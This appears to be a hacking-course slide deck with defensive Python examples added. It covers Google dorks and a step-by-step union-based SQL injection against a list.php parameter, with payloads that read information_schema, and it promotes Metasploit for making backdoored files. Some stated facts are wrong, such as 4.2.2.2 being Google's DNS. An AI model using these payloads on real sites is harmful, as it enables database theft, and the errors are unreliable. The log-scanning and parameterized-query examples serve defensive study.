Security Awareness Programme
1. Introduction to Hacking
Hacking is the art of manipulating things so that they work in a way they were not supposed to.
So, the term ‘Hacking’ is not confined to the world of computers.
Ex: Opening a car window using a ruler
2. Who am I?
A Hacker is a person who loves to explore technology and take it to the next level.
According to some stereotypes, hacking today refers to breaking into a computer system without authorization, which is a criminal offense under the law.
A person who uses their hacking skills for malicious purposes is called a cracker.
4. Technical Level of Hackers
Neophyte – A newbie in the field of computer security with almost no knowledge.
Script Kiddie – A non-expert who uses tools or scripts made by other hackers to break into systems, with little knowledge of the concept working behind the tool.
Elite – Also known as 1337, it is a term used to describe the most technically advanced hackers, who use cutting-edge technology.
5. IS HACKING LEGAL?
Yes, hacking is legal if you are authorized for it, i.e. hired to find vulnerabilities.
This is the job of an ETHICAL HACKER.
An Ethical Hacker is a person who uses their hacking skills to find security loopholes or vulnerabilities in the hiring client's TARGET system and reports the flaws to the administrator of the company.
6. Security Triangle
Defines the balance between Security, Functionality and Ease of use.
As security increases, the system's functionality and ease of use decrease.
11. STEPS OF ETHICAL HACKING
1. Information gathering
2. Scanning
3. Gaining access
4. Generating report
5. Report vulnerability
12. Footprinting
• Process of creating a blueprint or map of an organization's network and systems.
• Or, it is a technique of gathering information from various sources.
• Generally, a hacker spends 90 percent of the time profiling and gathering information on a target and 10 percent of the time launching the attack.
13. Sources of Information
• Media – TV, News etc.
• Social Network – Facebook, Twitter, Google+
• Search Engine – Google, Yahoo, Bing
• People Search – Yahoo! People, 123people.com etc.
• Domain name Lookups – Whois, SamSpade, Nslookup, Domain name lookup, DnsStuff
• Network Range – ARIN, IANA
• Geographic Map – Traceroute, NeoTrace, VisualRoute
• “Every single bit of information can be useful”
14. Sources of Information
Online Lookups
• Whois, ARIN, Centralops, SamSpade
• DNSstuff, Visual Trace, NeoTrace
Social Network + People Search
• Facebook, Google+, Twitter
• Yahoo! People, 123people
Search Engines, News Groups
• Google news, iGoogle
• Google, Yahoo, Bing, Ask
17. What is a firewall?
Firewalls are software programs or hardware devices that work as a filter between your computer (or network) and the internet, based on a set of rules.
It is similar to a security guard at the entrance who prevents intruders from entering the house and also prevents convicts from escaping.
Firewalls are of two types:
1. Software firewalls 2. Hardware firewalls
18. Software firewalls
• Used by individual home users.
• Installed on your computer as application software.
• Runs in the background and monitors network activity.
• Ex: Windows Firewall, BlackICE Defender, Kaspersky Internet Security, AVG Internet Security etc.
19. Hardware firewalls
• It is a device that guards the entrance to a network, not an individual computer.
• Basically, it is installed between your broadband cable or DSL modem and your computers.
• Provides a higher level of security than software firewalls.
22. What is DNS?
• DNS stands for Domain Name Server.
• It was difficult to remember the IP address of each website, so DNS came into action.
• It maintains a table with domain name and IP address columns in its database.
• Used for translating domain names into their respective IP addresses.
• Ex: facebook.com = 66.220.158.11
• Stores frequently used domains in its cache.
• Ex: Google's open DNS server: 4.2.2.2
24. Google Hacking
Founders of Google: Sergey Brin and Larry Page
“Google Hacking” doesn't mean “How to hack Google?”.
It is the skill of extracting valuable information from the web with the help of special keywords called “GOOGLE DORKS”.
The main idea is to “Pick a vulnerability, find the site”.
25. How does Google work?
• Google Bots: Bots are computer programs that automatically browse the world wide web in some order. These are also called web crawlers, spiders, ants or robots. Google mainly uses two bots:
Crawlers: A crawler traverses the web following the links found on different pages. When it finds any new page, it sends its link to the spider.
Spiders: A spider is a robotic browser-like program that downloads the web pages associated with the links sent by the crawlers.
• Indexer: It dissects and sorts every word, image etc. on every web page downloaded by the spiders.
• The Database is a warehouse for storing the pages downloaded and processed.
• Search Engine Results: Depending upon the search keywords, it digs search results out of the database following an algorithm.
26. Google: Server side
Google bots
The crawler finds new pages via
• URL submission at http://google.com/addurl.html
• Following the different links present on each webpage.
Spiders download these webpages to Google servers.
28. Basics of Google Hacking
+ – Forces the word to be searched. +firefox will bring up results that contain the word firefox.
- – Eliminates the word from search results. -chrome will bring up results that don't contain the word chrome.
“ ” – Delimiters for entire search phrases (not single words). “Internet Explorer” will return documents containing the phrase Internet Explorer.
. – Single letter wildcard. Krazzy.hack will search for words like krazzy@hack, krazzy2hack, krazzy-hack, krazzy_hack etc.
* – Single word wildcard. hack * planet will search for phrases like hack the planet, hack for planet, hack all planet etc.
| – Logical OR. firefox|chrome will return documents containing either firefox or chrome but not both.
29. Google query: keywords - I
site – Restricts the search within the specified domain. site:xyz.com will show all pages on xyz.com crawled by Google bots.
intitle – Restricts results to documents whose title contains the specified word. intitle:fox fire will find all sites with the word fox in the title and fire in the text.
allintitle – Restricts results to documents whose title contains all the specified phrases. allintitle:fox fire will find all sites with the words fox and fire in the title, so it's equivalent to intitle:fox intitle:fire.
inurl – Restricts the results to sites whose URL contains the specified word. inurl:hacker will find sites whose URL contains the word hacker.
allinurl – Restricts results to sites whose URL contains all the specified phrases. allinurl:hacker vs cracker will find the sites whose URL contains hacker vs cracker.
filetype – Filters the search to the specified file types. filetype:pdf Google hacking will show all the PDF documents containing the words Google hacking.
30. Google query: keywords - II
link – Restricts results to sites containing links to the specified location. link:www.google.com will return documents containing one or more links to www.google.com.
inanchor – Restricts results to sites containing anchor text with the specified word. inanchor:backtrack will return documents that have backtrack as anchor text (not URL).
allintext – Restricts results to documents containing the specified phrase in the text only. allintext:“Kevin Mitnick” will return documents which contain the phrase Kevin Mitnick in their text only.
numrange – Restricts results to documents containing a number from the specified range. numrange:1-100 fire will return sites containing a number from 1 to 100 and the word fire. The same result can be achieved with 1..100 fire.
cache – Shows the cached version of a URL. cache:xyz.com will show how the site looked the last time Google bots visited it.
32. System Hacking
Where Windows stores the password
Reset Windows logon password
Play with sticky keys
OPHCRACK
Make a folder System Hidden
Enable/Disable USB devices
Make drives invisible
Make an undeletable folder
Trojans
34. Email Hacking
How to trace the sender of an email
Check if the sender has opened your mail
Get the IP address of your friend on chat
Secret Question….
Phishing – Yeah I got a fish ;-)
Keyloggers – what the heck??
35. Phishing
The attacker convinces the victim to enter their details on a fake page.
When the victim enters their credentials on the form, they are stored in a separate log file
and the victim is redirected to the original site.
45. SQL Injection
• What is a Database?
- A collection of logically related data
- It is similar to an attendance register
• Define Table?
- It is a combination of rows and columns
• What is SQL?
- SQL stands for Structured Query Language.
- Used to select information from the database
46. Basic SQL queries
Create a table
• Create table users(name varchar(30), email varchar(50), password varchar(30), address varchar(100));
Extracting data from a table
• Select name, email, password from users;
• Select * from users where email='xyz@abc.com' AND password='s3cr3t';
• Select * from users order by name;
47. Basics of SQL Injection
• How to find a site that is vulnerable to an SQL injection attack?
- Use Google dorks
- inurl:view_faculty.php?id=
- inurl:viz.php?id=
- inurl:list.php?id=
- Use a vulnerability scanner
- Acunetix
- W3af
48. What happens in the background??
• Check if the site is vulnerable or not?
- Ex: http://xyz.com/list.php?id=3
Select name, email, password from users where id=3;
- Ex: http://xyz.com/list.php?id=3'
Select name, email, password from users where id=3';
THIS WILL GIVE AN ERROR MESSAGE, WHICH MEANS WE CAN DIRECTLY COMMUNICATE WITH THE DATABASE!!
49. So WHAT'S NEXT???
• We will try to find the number of columns in the table
http://xyz.com/list.php?id=3+order+by+1--
Select name, email, password from users where id=3 order by 1--
- It will extract name, email, password from the users table and sort the contents by the 1st column, so it will give you the fresh original webpage.
Select name, email, password from users where id=3 order by 100--
- It will extract name, email, password from the users table and sort the contents by the 100th column; there isn't any 100th column, so it will give you an error.
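What the two slides above describe, shown as an added example that is not code from the original deck: a Python/sqlite3 model of a list.php-style lookup that pastes id straight into the SQL text, beside the parameterized form a defender would ship. The users table, its rows and the three-column layout (name, email, password, matching the slide's query rather than the six-column table used later) are all constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the slide's users table (sample rows only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, name TEXT, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(3, "alice", "alice@example.com", "s3cr3t"),
         (4, "bob", "bob@example.com", "hunter2")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors list.php?id=...: the raw parameter is pasted into the SQL text,
    so anything after the number (a quote, ORDER BY, UNION ...) is parsed as SQL."""
    sql = "SELECT name, email, password FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value is bound to a placeholder and never parsed as SQL.
    A malformed id simply matches no row instead of producing a database error."""
    sql = "SELECT name, email, password FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(conn, lookup, user_id):
    """Run one lookup and report ('rows', count) or ('error', exception class name).
    That visible difference is exactly what the slide's id=3' test relies on."""
    try:
        return ("rows", len(lookup(conn, user_id)))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    for value in ["3", "3'", "3 order by 1--", "3 order by 100--"]:
        print(f"id={value!r:20} vulnerable={probe(db, lookup_vulnerable, value)}"
              f"  parameterized={probe(db, lookup_parameterized, value)}")
```

Run it and the vulnerable path errors on the stray quote and on order by 100 while answering order by 1 normally, which is the oracle the slides describe; the parameterized path returns zero rows for every malformed value and never errors. In a real application the database error should also never reach the browser: log it server-side and return a generic page, so that a probe gets no signal even from code that is not yet fixed.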
50. Finding columns
• So, we will increment the ‘order by’ value by 1 until we get an error
http://xyz.com/list.php?id=3+order+by+1--
http://xyz.com/list.php?id=3+order+by+2--
http://xyz.com/list.php?id=3+order+by+3--
:
:
http://xyz.com/list.php?id=3+order+by+7--
The above query returns an error, which means there are 6 columns in the current table.
51. Find the vulnerable column
• We select all the columns, i.e. from 1-6
http://xyz.com/list.php?id=3+union+all+select+1,2,3,4,5,6--
• Try to find the vulnerable column that will return data
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--
IT WILL RETURN THE NUMBERS OF THE VULNERABLE COLUMNS, i.e. 1, 2, 3, 4, 5 or 6.
52. SQLi cont..
• Suppose it returns 2 and 6
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--
• Then we can fetch any information in the database at these column numbers
http://xyz.com/list.php?id=-3+union+all+select+1,@@version,3,4,5,database()--
This will return the version of the database and the name of the database.
SYSTEM VARIABLES
@@version : Returns the version of the database
@@user : Returns the user currently logged in
@@database : Returns the name of the database
53. Information Schema
• Most websites use MySQL databases for storing their information.
• MySQL has an ‘INFORMATION_SCHEMA’ database which keeps a record of all the schemas, tables and columns on the server.
• INFORMATION_SCHEMA.SCHEMATA stores schema details.
• INFORMATION_SCHEMA.TABLES stores all the information regarding tables in the database.
• INFORMATION_SCHEMA.COLUMNS stores information on all the columns in all the tables.
54. SQLi Cont…
• The query below will extract all the databases on the current server.
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_concat(schema_name)+from+information_schema.schemata--
• The code below will extract all the tables in the current db
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_concat(table_name)+from+information_schema.tables--
55. SQLi Cont…
• Extract all the columns from the current table
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_concat(column_name)+from+information_schema.columns+where+table_name='users'--
• Extract all the
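Slides 48 to 55 together describe a sequence of requests (a stray quote, climbing order by values, then union select against information_schema) that leaves a recognisable trail in the web server's access log. As an added example that is not part of the original deck, this Python script parses a few Apache-style log lines, URL-decodes the request path and flags those patterns per source IP. The log lines, IP addresses, timestamps and signature names are all constructed for the demonstration; the endpoint names echo the slides' list.php and view_faculty.php examples.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (not from any real server). They
# replay the slides' sequence against a list.php-style endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /list.php?id=3 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /list.php?id=3%27 HTTP/1.1" 500 412 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:47 +0000] "GET /list.php?id=3+order+by+7-- HTTP/1.1" 500 412 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /list.php?id=-3+union+all+select+1,2,3,4,5,group_concat(schema_name)+from+information_schema.schemata-- HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:56:10 +0000] "GET /view_faculty.php?id=12 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request path, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the probes the slides walk through. They run on the decoded
# path, so "+", "%20" and "%27" encodings do not hide the payload.
SIGNATURES = [
    ("order-by column probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("information_schema read", re.compile(r"information_schema\.", re.I)),
    ("server variable read", re.compile(r"@@(version|user|database)\b", re.I)),
    ("stray quote after numeric id", re.compile(r"[?&]id=-?\d+'", re.I)),
]


def parse_line(line):
    """Return a dict for one log line (with a URL-decoded path), or None if it does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = unquote_plus(rec["path"])
    return rec


def scan(log_text):
    """Return one (ip, status, decoded_path, [signature names]) tuple per flagged request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [name for name, rx in SIGNATURES if rx.search(rec["decoded_path"])]
        if hits:
            findings.append((rec["ip"], rec["status"], rec["decoded_path"], hits))
    return findings


def count_by_ip(findings):
    """Flagged requests per client IP; several in a short window is the pattern worth escalating."""
    return Counter(ip for ip, _, _, _ in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip, status, path, names in hits:
        print(f"{ip} {status} {path}\n    -> {', '.join(names)}")
    print("flagged requests per IP:", dict(count_by_ip(hits)))
```

On the sample data three of the five requests are flagged, all from the same client, and the 500 responses on the quote and order by lines are the server-side echo of the error message the slides rely on. Decoding before matching matters: the raw log holds "3%27" and "order+by", which a naive substring match on the undecoded path would miss.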
56. Metasploit Framework
• It is a framework to exploit the services found during the scanning phase
• You can create virus-infected files using this framework within a couple of minutes
• After breaking into the system, you can set a backdoor, download files, upload files, disable the mouse, disable the keyboard… and lots more
• We have provided a detailed full-length HD video tutorial on the DVD and an ebook